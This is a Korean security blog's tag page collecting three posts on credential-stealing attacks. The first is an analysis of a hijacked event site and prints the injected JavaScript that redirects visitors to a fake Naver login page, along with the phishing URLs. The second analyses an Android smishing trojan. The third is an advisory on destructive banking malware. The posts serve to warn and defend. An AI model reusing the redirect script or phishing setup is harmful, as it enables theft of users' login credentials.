'탈취'에 해당되는 글 4건

  1. 2015.08.20 네이버 로그인 정보 탈취 피싱사이트
  2. 2013.03.14 스마트폰 공인인증서 탈취 악성 앱 발견
  3. 2013.01.02 시스템 파괴 기능이 포함된 금융정보 탈취형 악성코드 피해주의
2015.08.20 18:43

네이버 로그인 정보 탈취 피싱사이트

여름 끝자락, 가족물총축제로 시원하게!

http://mediahub.seoul.go.kr/archives/903363


위 사이트에 게재된 뉴스 기사를 통해 아래 내용을 접하고


기사내용 일부:

참가 접수는 물총축제 홈페이지(water.ibabynews.com)에서 진행하며, 신청한 가족 중 추첨을 통해 500가족을 선발합니다.


해당 내용에 따라 참가 접수를 위해 홈페이지 방문을 했는데 아래와 같이 네이버 로그인 창이 떳다.



이는 그냥 봐도 의심 안할 수가 없는 상황이다. ㅋ

네이버 로그인을 붙일 수는 없을것 같은데 설마해서 아이디/비밀번호를 엉터리로 입력해서 로그인 해봤다.

결국 에러창이 떳고 세부내용 확인 결과 네이버 로그인 정보 탈취하는 피싱사이트 감염된 상태였다.



문제가 되는 naver.js 파일이 로딩되고 있었다.


http://www.kwanginsa.com/cd/naver.js

if(document.cookie.indexOf("do_naver=")==-1)

{


var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="do_naver=Yes;path=/;expires="+expires.toGMTString();

var ref = document.referrer;

location.href="http://www.koreaconst.co.kr/file_upload/login.php";


}


이는 네이버 로그인 정보 탈취 피싱사이트로 이동시키고 있었다.


http://www.koreaconst.co.kr/file_upload/login.php


네이버 아이디 비밀번호를 입력하면 해커에게 고스란히 전달될 것이다.



피싱사이트 URL로 네이버 툴바가 설치된 상태에서 접속을 해보면 차단을 해준다.

하지만, 위 사이트처럼 프레임 내부에서 이동될 경우에는 안타깝게도 차단되지 않는다.


http://www.koreaconst.co.kr/file_upload/login.php


해당 피싱사이트에 접속해보면 아래와 같이 네이버와 유사한 로그인 창이 나타나게 되고

일반적인 사용자는 의심없이 네이버 아이디와 비밀번호를 입력할 것이다.



본인이 직접 네이버 사이트로 접속을 한 경우가 아니라면

네이버 아이디와 비밀번호를 요구할 경우 반드시 의심을 해보고

의심스럽다 생각될 경우 아이디와 비밀번호를 엉터리로 입력해서

정상적으로 네이버 로그인 에러 화면이 나오는지 반드시 확인되어야 할 것이다.


그리고 사이트 비밀번호는 반드시 사이트 마다 서로다른 비밀번호를 사용해야 하며

비밀번호는 주기적으로 변경을 통해 꾸준한 관리가 반드시 필요하다.

비밀번호 변경시에는 이전 사용한 비밀번호 사용을 재사용 하지 않아야 한다.


Trackback 0 Comment 0
2013.03.14 18:36

스마트폰 공인인증서 탈취 악성 앱 발견

[전체요약]

스마트폰 사용자의 호기심을 자극하는 내용으로 문자 메시지를 발송하고, 수신된 문자 메시지에 포함된 링크를 스마트폰 사용자가 설치하도록 유도하는 기존의 스미싱 악성앱과 동작방식이 동일한 악성코드가 지속적으로 발견되고 있다.

 
이번에 발견된 악성코드는 이전의 문자 메시지를 탈취하는 기능에 사진과 메모도 탈취 할 수 있는 기능이 추가되어 사생활의 침해가 우려된다. 그 기능뿐만 아니라 모바일 공인인증서를 탈취 하는 기능도 추가되어 기존의 소액결제피해를 넘어선 금융 피해를 일으 킬 수 있으므로 사용자의 각별한 주의가 필요하다.

 

[주요증상]

 

- 문자 메시지 탈취 및 사용자의 전화번호 탈취

 

- 공인인증서, 메모, 사진의 탈취

 

- 전화 착신 및 발신 차단

 

[분석정보]

 

1. Android/Trojan-SMS.Fraud-SMS-Stealer.dc

 

파일명 : pftp0312.apk

 

[그림 1] pftp0312.apk의 아이콘

 

A. 감염 경로


Android/Trojan-SMS.Fraud-SMS-Stealer.dc는 스미싱 문자 메시지의 링크를 통하여 감염된다.

 

B. 감염 증상


1) Android/Trojan-SMS.Fraud-SMS-Stealer.dc의 어플리케이션의 권한은 아래의 그림과 같다.
 


[그림 2] pftp0312.apk 어플리케이션의 권한

 

 

2) 해당 악성 앱은 부팅이 되었는지 감지하여 만약 재부팅이 되었을 때 서비스를 자동으로 동작시킨다.
 


[그림 3] 부팅감지

 

 

3) 해당 악성 앱은 처음 실행하게 되면 별도의 UI가 보여지지 않으며 곧바로 종료되는 것처럼 보인다. 그러나 백그라

운드로 악성 프로세서가 감염된 사용자의 스마트폰 전화번호를 전송하게 되며 감염되었음을 등록시킨다.
 


[그림 4] 전화번호 전송 및 등록

 

 

4) 해당 악성 앱은 동작할 때도 따로 UI가 존재하지 않으며 서비스로만 동작하고 있다는 것을 확인 할 수 있다.
 


[그림 5] 서비스로 동작

 

 

5) 해당 악성 앱이 처음 실행될 때 스마트폰에 존재하고 있는 공인인증서와 메모를 zip파일로 만들 수 있으며 사진과

 같이 특정 서버에 전송한다. 서버에 저장 될 때는 [전화번호_IMEI]의 디렉토리가 생성되며 해당 디렉토리에 각각

NPKI, MEMO, DCIM의 하위 디렉토리명으로 저장된다.
 


[그림 6] 공인인증서, 메모, 사진 탈취

 


[그림 7] 탈취된 정보

 

 

6) 해당 악성 앱은 서비스로 동작할 때 3가지의 리시버를 등록시키며 리시버의 종류는 다음과 같다.


문자 메시지 수신 리시버

전화 착신 리시버

전화 발신 리시버
 


[그림 8] 리시버 설치

 

 

7) 문자 메시지 수신 리시버는 abortBroadcast를 이용하여 문자 메시지가 왔다는 사실을 차단하여 사용자는 문자 메시지가 도착한 것을 알 수 없다.
 


[그림 9] 문자 메시지 차단

 

 

8) 문자 메시지 수신 리시버는 문자 메시지의 내용들을 유출시킨다. 유출시킬 때 ‘||’기호를 구분자로 할 것으로 추정

되며 순서대로 [사용자의 스마트폰 전화번호||문자 메시지 내용||발신처||문자 메시지를 받은 시간]으로 만들어 보내

진다.
 


[그림 10] 문자 메시지 유출

 

 

9) 문자 메시지 수신 리시버는 assets에 url.txt라는 문서파일이 존재하며 여기에 있는 URL을 가지고 보내도록 되어

있다. 이 부분으로 인하여 URL.txt만 변경시켜주면 문자 메시지를 탈취하는 서버의 URL을 변경할 수 있다.
 


[그림 11] URL.txt 파싱

 

 

10) 전화 착신 리시버는 전화가 착신되었을 때 mobile.txt에 저장된 전화번호나 15가 포함된 전화번호인지 체크하며

 조건이 일치할 경우에는 전화 착신을 차단 시켜서 사용자가 전화가 왔다는 사실을 알 수 없도록 한다.
 


[그림 12] 전화 착신 차단

 

 

11) 전화 발신 리시버는 사용자가 전화를 걸게 될 때 mobile.txt에 저장된 전화번호나 15가 포함된 전화번호인지 체크

하며 조건이 일치할 경우에는 전화 발신을 차단 시켜서 사용자가 해당 전화번호에 연결 할 수 없게 한다.
 


[그림 13] 전화 발신 차단

 

 

12) 해당 악성 앱이 공인인증서, 메모, 사진의 유출을 시도하는 URL의 IP위치는 미국으로, 문자 메시지 유출을 시도하

는 URL의 IP위치는 태국으로 확인된다.
 


[그림 14] 공인인증서, 메모, 사진 등의 탈취 위치

 


[그림 15] 문자 메시지 탈취 위치



출처 : 하우리



Trackback 0 Comment 0
2013.01.02 18:49

시스템 파괴 기능이 포함된 금융정보 탈취형 악성코드 피해주의

개요

  • 인터넷 뱅킹 이용 시 피싱 사이트로 유도시켜 금융정보를 탈취하는 한편 감염된 PC의 중요 시스템 파일을 삭제하여 정상적인 이용을 방해하는 악성코드에 대한 감염피해 주의
    ※ 해당 악성코드에 감염된 경우 특정일(2013년 1월 15일) 이후 윈도우 시스템 폴더의 중요 파일들을 삭제하여 
        부팅이 불가능하게 됨

 

주요특징

  • 윈도우 시스템 폴더에 아래와 같은 비정상적인 폴더를 생성하며 접근, 삭제 등이 불가능함
    ※  C:\WINDOWS\SYSTEM32\MUIS\tempblogs.


권고사항

  • P2P 등 의심스러운 사이트로부터 실행파일 다운로드 및 실행 자제
  • 출처가 불분명한 이메일의 첨부파일을 통한 감염피해를 입지 않도록 주의
  • 윈도우 및 백신 프로그램 등의 최신 보안업데이트 적용
  • 인터넷 뱅킹 이용 시 피싱 사이트로 접속되어 정보유출이 발생할 수 있으므로 정상 사이트 여부 확인
  • 향후, 이와 유사한 형태의 변종 악성코드 발생이 우려되므로 PC 이용 시 주의필요
  • 전용백신을 통한 점검 및 치료
    ※ 다운로드주소 :  http://www.boho.or.kr/kor/download/download_03_1.jsp 

 

문의사항

  • 한국인터넷진흥원 인터넷침해대응센터: 국번없이 118


Trackback 0 Comment 0